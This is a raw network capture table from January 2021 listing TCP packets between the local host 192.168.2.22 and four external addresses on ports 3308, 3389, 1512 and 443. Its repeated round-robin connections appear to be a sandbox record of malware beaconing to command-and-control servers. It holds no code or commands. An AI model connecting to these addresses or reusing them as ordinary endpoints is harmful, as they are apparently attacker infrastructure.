Jan 12, 2021 01:45:03.118486881 CET	49282	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:03.159424067 CET	3308	49282	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:03.161791086 CET	3308	49282	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:03.161833048 CET	3308	49282	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:03.275496960 CET	3308	49282	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:03.275549889 CET	3308	49282	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:03.276268005 CET	49282	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:03.280317068 CET	49282	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:03.323585033 CET	3308	49282	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:03.391393900 CET	49283	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:03.445705891 CET	3389	49283	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:03.445837975 CET	49283	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:03.447422981 CET	49283	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:03.501816988 CET	3389	49283	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:03.525799990 CET	3389	49283	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:03.525846004 CET	3389	49283	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:03.525906086 CET	49283	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:03.525932074 CET	49283	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:03.537122965 CET	49283	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:03.607757092 CET	3389	49283	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:03.607841969 CET	49283	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:03.612654924 CET	49283	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:03.612757921 CET	49283	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:03.668775082 CET	3389	49283	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:03.668945074 CET	49283	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:03.708076954 CET	3389	49283	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:03.723675013 CET	3389	49283	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:03.723718882 CET	3389	49283	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:03.814316034 CET	3389	49283	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:03.814362049 CET	3389	49283	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:03.814420938 CET	49283	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:03.814460993 CET	49283	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:03.819961071 CET	49283	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:03.874581099 CET	3389	49283	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:03.936599970 CET	49284	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:03.989641905 CET	1512	49284	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:03.989743948 CET	49284	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:03.999933004 CET	49284	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:04.052830935 CET	1512	49284	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:04.059638023 CET	1512	49284	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:04.059689045 CET	1512	49284	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:04.059783936 CET	49284	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:04.071003914 CET	49284	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:04.125013113 CET	1512	49284	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:04.125197887 CET	49284	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:04.131860018 CET	49284	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:04.132008076 CET	49284	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:04.184979916 CET	1512	49284	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:04.186395884 CET	49284	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:04.222364902 CET	1512	49284	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:04.239432096 CET	1512	49284	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:04.265543938 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:45:04.340358019 CET	1512	49284	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:04.340401888 CET	1512	49284	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:04.340467930 CET	49284	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:04.340513945 CET	49284	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:04.346091032 CET	49284	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:04.398989916 CET	1512	49284	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:04.468141079 CET	49285	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:04.520236015 CET	443	49285	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:04.520390987 CET	49285	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:04.520950079 CET	49285	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:04.573107958 CET	443	49285	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:04.587567091 CET	443	49285	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:04.587704897 CET	49285	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:04.605559111 CET	49285	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:04.659954071 CET	443	49285	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:04.660294056 CET	49285	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:04.679409027 CET	49285	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:04.679730892 CET	49285	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:04.731651068 CET	443	49285	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:04.731770039 CET	49285	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:04.783958912 CET	443	49285	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:04.901917934 CET	443	49285	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:04.901962042 CET	443	49285	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:04.902225971 CET	49285	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:04.907838106 CET	49285	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:04.959883928 CET	443	49285	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:05.029325008 CET	49286	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:05.072689056 CET	3308	49286	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:05.073000908 CET	49286	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:05.074630022 CET	49286	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:05.117778063 CET	3308	49286	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:05.128540039 CET	3308	49286	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:05.128587008 CET	3308	49286	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:05.128667116 CET	49286	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:05.128698111 CET	49286	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:05.145397902 CET	49286	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:05.190407991 CET	3308	49286	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:05.190541029 CET	49286	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:05.201189041 CET	49286	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:05.201507092 CET	49286	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:05.244724035 CET	3308	49286	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:05.244834900 CET	49286	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:05.285458088 CET	3308	49286	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:05.288007975 CET	3308	49286	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:05.288048983 CET	3308	49286	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:05.400645971 CET	3308	49286	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:05.400693893 CET	3308	49286	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:05.400926113 CET	49286	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:05.406562090 CET	49286	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:05.449858904 CET	3308	49286	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:05.525403023 CET	49287	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:05.579593897 CET	3389	49287	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:05.579740047 CET	49287	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:05.580518961 CET	49287	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:05.634426117 CET	3389	49287	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:05.666074991 CET	3389	49287	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:05.666174889 CET	3389	49287	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:05.666229010 CET	49287	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:05.666268110 CET	49287	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:05.672915936 CET	49287	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:05.736962080 CET	3389	49287	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:05.737162113 CET	49287	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:05.747498035 CET	49287	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:05.747740030 CET	49287	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:05.801553965 CET	3389	49287	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:05.801681042 CET	49287	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:05.841109991 CET	3389	49287	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:05.859633923 CET	3389	49287	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:05.859673977 CET	3389	49287	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:05.950572968 CET	3389	49287	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:05.950613976 CET	3389	49287	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:05.950969934 CET	49287	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:05.956480026 CET	49287	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:06.010584116 CET	3389	49287	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:06.074343920 CET	49288	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:06.127382994 CET	1512	49288	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:06.127506018 CET	49288	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:06.129076004 CET	49288	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:06.181952000 CET	1512	49288	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:06.188652039 CET	1512	49288	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:06.188692093 CET	1512	49288	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:06.188765049 CET	49288	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:06.188802958 CET	49288	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:06.203044891 CET	49288	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:06.257110119 CET	1512	49288	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:06.257466078 CET	49288	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:06.267790079 CET	49288	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:06.268105984 CET	49288	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:06.321006060 CET	1512	49288	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:06.321116924 CET	49288	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:06.358350039 CET	1512	49288	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:06.374007940 CET	1512	49288	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:06.474549055 CET	1512	49288	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:06.474596024 CET	1512	49288	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:06.474843025 CET	49288	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:06.480519056 CET	49288	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:06.533380032 CET	1512	49288	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:06.589256048 CET	49289	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:06.641643047 CET	443	49289	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:06.641757965 CET	49289	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:06.643446922 CET	49289	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:06.695730925 CET	443	49289	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:06.703485012 CET	443	49289	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:06.703594923 CET	49289	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:06.720196009 CET	49289	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:06.773722887 CET	443	49289	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:06.774018049 CET	49289	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:06.784276009 CET	49289	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:06.784596920 CET	49289	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:06.836837053 CET	443	49289	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:06.836946964 CET	49289	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:06.889278889 CET	443	49289	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:07.007108927 CET	443	49289	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:07.007153034 CET	443	49289	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:07.007441044 CET	49289	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:07.013010979 CET	49289	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:07.065197945 CET	443	49289	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:07.135611057 CET	49290	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:07.178936005 CET	3308	49290	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:07.179060936 CET	49290	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:07.180682898 CET	49290	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:07.223768950 CET	3308	49290	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:07.238284111 CET	3308	49290	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:07.238327980 CET	3308	49290	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:07.238379955 CET	49290	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:07.238410950 CET	49290	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:07.253370047 CET	49290	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:07.299326897 CET	3308	49290	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:07.299694061 CET	49290	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:07.309206009 CET	49290	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:07.309428930 CET	49290	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:07.352704048 CET	3308	49290	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:07.352819920 CET	49290	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:07.393549919 CET	3308	49290	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:07.396020889 CET	3308	49290	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:07.509248018 CET	3308	49290	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:07.509294033 CET	3308	49290	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:07.509629011 CET	49290	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:07.515738010 CET	49290	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:07.558936119 CET	3308	49290	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:07.630968094 CET	49291	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:07.684997082 CET	3389	49291	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:07.685137033 CET	49291	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:07.686408043 CET	49291	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:07.740678072 CET	3389	49291	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:07.771133900 CET	3389	49291	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:07.771178007 CET	3389	49291	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:07.771233082 CET	49291	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:07.771255970 CET	49291	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:07.776817083 CET	49291	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:07.838824987 CET	3389	49291	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:07.838992119 CET	49291	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:07.880947113 CET	49291	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:07.881141901 CET	49291	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:07.935379982 CET	3389	49291	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:07.935647011 CET	49291	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:07.974838972 CET	3389	49291	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:07.989718914 CET	3389	49291	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:07.989758015 CET	3389	49291	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:08.082314014 CET	3389	49291	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:08.082355976 CET	3389	49291	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:08.082449913 CET	49291	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:08.082489014 CET	49291	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:08.088161945 CET	49291	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:08.145102978 CET	3389	49291	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:08.196175098 CET	49292	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:08.248943090 CET	1512	49292	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:08.249092102 CET	49292	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:08.249847889 CET	49292	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:08.302522898 CET	1512	49292	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:08.309695005 CET	1512	49292	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:08.309737921 CET	1512	49292	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:08.309784889 CET	49292	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:08.312622070 CET	49292	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:08.325628042 CET	49292	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:08.379528046 CET	1512	49292	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:08.379642963 CET	49292	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:08.389422894 CET	49292	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:08.389719963 CET	49292	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:08.442373991 CET	1512	49292	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:08.442487001 CET	49292	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:08.482223034 CET	1512	49292	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:08.495222092 CET	1512	49292	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:08.593660116 CET	1512	49292	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:08.593703985 CET	1512	49292	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:08.593869925 CET	49292	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:08.719279051 CET	49292	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:08.772449970 CET	1512	49292	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:08.836218119 CET	49293	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:08.888400078 CET	443	49293	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:08.888520002 CET	49293	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:08.890356064 CET	49293	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:08.942341089 CET	443	49293	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:08.957114935 CET	443	49293	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:08.957214117 CET	49293	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:08.968523026 CET	49293	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:09.022914886 CET	443	49293	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:09.023156881 CET	49293	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:09.032461882 CET	49293	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:09.032666922 CET	49293	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:09.084657907 CET	443	49293	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:09.084955931 CET	49293	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:09.123095989 CET	443	49293	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:09.137203932 CET	443	49293	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:09.255863905 CET	443	49293	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:09.255904913 CET	443	49293	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:09.256114960 CET	49293	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:09.256150961 CET	49293	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:09.582556963 CET	49293	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:09.634660006 CET	443	49293	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:09.690100908 CET	49294	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:09.733306885 CET	3308	49294	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:09.733439922 CET	49294	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:09.750087976 CET	49294	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:09.795595884 CET	3308	49294	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:09.805911064 CET	3308	49294	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:09.805949926 CET	3308	49294	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:09.806021929 CET	49294	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:09.808795929 CET	49294	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:09.835452080 CET	49294	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:09.880846024 CET	3308	49294	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:09.880933046 CET	49294	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:09.885019064 CET	49294	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:09.885071039 CET	49294	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:09.928262949 CET	3308	49294	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:09.928456068 CET	49294	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:09.968517065 CET	3308	49294	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:09.971698999 CET	3308	49294	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:09.971741915 CET	3308	49294	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:10.085211992 CET	3308	49294	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:10.085252047 CET	3308	49294	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:10.085505962 CET	49294	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:10.091156960 CET	49294	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:10.134294033 CET	3308	49294	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:10.203547001 CET	49295	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:10.257605076 CET	3389	49295	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:10.257787943 CET	49295	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:10.258469105 CET	49295	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:10.312360048 CET	3389	49295	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:10.330020905 CET	3389	49295	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:10.330066919 CET	3389	49295	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:10.330172062 CET	49295	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:10.330209970 CET	49295	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:10.341068029 CET	49295	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:10.402374983 CET	3389	49295	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:10.403120995 CET	49295	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:10.408281088 CET	49295	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:10.408355951 CET	49295	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:10.462937117 CET	3389	49295	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:10.463323116 CET	49295	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:10.502113104 CET	3389	49295	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:10.517467022 CET	3389	49295	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:10.517508030 CET	3389	49295	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:10.609894991 CET	3389	49295	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:10.609937906 CET	3389	49295	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:10.610315084 CET	49295	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:10.615881920 CET	49295	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:10.670101881 CET	3389	49295	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:10.727411985 CET	49296	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:10.780497074 CET	1512	49296	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:10.780666113 CET	49296	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:10.781863928 CET	49296	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:10.834865093 CET	1512	49296	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:10.841654062 CET	1512	49296	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:10.841696978 CET	1512	49296	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:10.841768980 CET	49296	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:10.841814041 CET	49296	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:10.855837107 CET	49296	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:10.909977913 CET	1512	49296	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:10.910192966 CET	49296	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:10.920378923 CET	49296	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:10.920773029 CET	49296	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:10.975945950 CET	1512	49296	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:10.976248026 CET	49296	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:11.010451078 CET	1512	49296	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:11.031853914 CET	1512	49296	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:11.031907082 CET	1512	49296	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:11.133543968 CET	1512	49296	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:11.133591890 CET	1512	49296	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:11.133903980 CET	49296	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:11.139648914 CET	49296	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:11.192632914 CET	1512	49296	46.105.131.65	192.168.2.22
